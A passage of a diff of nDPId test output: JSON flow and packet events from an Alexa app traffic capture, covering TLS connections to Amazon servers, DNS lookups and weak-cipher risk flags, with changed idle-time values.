{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041156,"flow_last_seen":1490976041279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976041279,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041384,"flow_last_seen":1490976041384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041384,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1490976041384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041384,"pkt":"AMDKkaPvePiC0\/vCCABFAAA807JAAEAGczysECrYNF7ohrJeAbv1uZ3IAAAAAKAC\/\/+9JQAAAgQFtAQCCAoA9k56AAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041400,"flow_last_seen":1490976041400,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041400,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1490976041400,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041400,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ul5AAEAGjJCsECrYNF7ohrJfAburivQiAAAAAKAC\/\/+w9wAAAgQFtAQCCAoA9k58AAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041428,"flow_last_seen":1490976041428,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041428,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1490976041428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041428,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G65AAEAGvmusECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/V3gAAAgQFtAQCCAoA9k5+AAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041434,"flow_last_seen":1490976041434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1490976041434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041434,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hqRAAEAGEYasECrYwKgLAZX3H5Abo8jbAAAAAKAC\/\/+78QAAAgQFtAQCCAoA9k5\/AAAAAAEDAwg="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1490976041437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1490976041437,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QlfcAAAAAG6PI3FAUAABzNwAAAAAAAAAA"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1490976041439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041439,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwm7lAAOcGBEE0XuiGrBAq2AG7sl5u82R89bmdyXASH\/5VMQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1490976041440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07NAAEAGc0+sECrYNF7ohrJeAbv1uZ3JbvNkfVAQAVefogAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041384,"flow_last_seen":1490976041444,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1490976041446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041446,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwNmhAAOcGaZI0XuiGrBAq2AG7sl88IzNAq4r0I3ASH\/6tEQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1490976041447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041447,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoul9AAEAGjKOsECrYNF7ohrJfAburivQjPCMzQVAQAVf3ggAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041400,"flow_last_seen":1490976041448,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976041448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041400,"flow_last_seen":1490976041498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041498,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041384,"flow_last_seen":1490976041502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976041502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041680,"flow_last_seen":1490976041680,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1490976041680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzJAAEAGfuesECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9j3AAAAgQFtAQCCAoA9k6YAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041770,"flow_last_seen":1490976041770,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976041770,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1490976041770,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976041770,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWlRAAEARM0qsECrYrBAqAVOPADUAQZgzlqMBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"} 00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041770,"flow_last_seen":1490976041770,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976041770,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -175,35 +175,35 @@ 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041806,"flow_last_seen":1490976041806,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976041806,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1490976041866,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976041866,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl0nZAAEARuxesECoBrBAq2AA1U48AUSKClqOBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAOQAENu8Yug=="} 00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976041866,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.186"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041870,"flow_last_seen":1490976041870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1490976041870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041870,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YDpAAEAGs\/CsECrYNu8YuoTjAbvEzS6RAAAAAKAC\/\/9XzwAAAgQFtAQCCAoA9k6rAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041870,"flow_last_seen":1490976041870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1490976041870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041870,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YDpAAEAGs\/CsECrYNu8YuoTjAbvEzS6RAAAAAKAC\/\/9XzwAAAgQFtAQCCAoA9k6rAAAAAAEDAwg="} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1490976041938,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976041938,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC90nlAAEARurysECoBrBAq2AA1y20AqYS4a+qBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAABMAAoDd3d3A2NkbsAQwCwABQABAAAA+AAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAgABDRV0djAQgABAAEAAAAIAAQ0VdHFwEIAAQABAAAACAAENFXRj8BCAAEAAQAAAAgABDRV0Xo="} 00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976041938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041942,"flow_last_seen":1490976041942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1490976041942,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BJdAAEAGWQ+sECrYNFXR2NSLAbvD9kolAAAAAKAC\/\/823gAAAgQFtAQCCAoA9k6yAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1490976041952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041952,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwusBAAOcGsnU27xi6rBAq2AG7hOPN4I6FxM0uknASH\/5nFQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1490976041953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041953,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYDtAAEAGtAOsECrYNu8YuoTjAbvEzS6SzeCOhlAQAVexhgAA"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041961,"flow_last_seen":1490976041961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041961,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1490976041961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041961,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8261AAEAGgfisECrYNFXR2NSMAbsYT5UZAAAAAKAC\/\/+XjgAAAgQFtAQCCAoA9k60AAAAAAEDAwg="} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041870,"flow_last_seen":1490976041962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976041962,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1490976041989,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041989,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iuwz0jww\/ZKJqAScSDA4QAAAgQFtAQCCAptm51vAPZOsgEDAwg="} 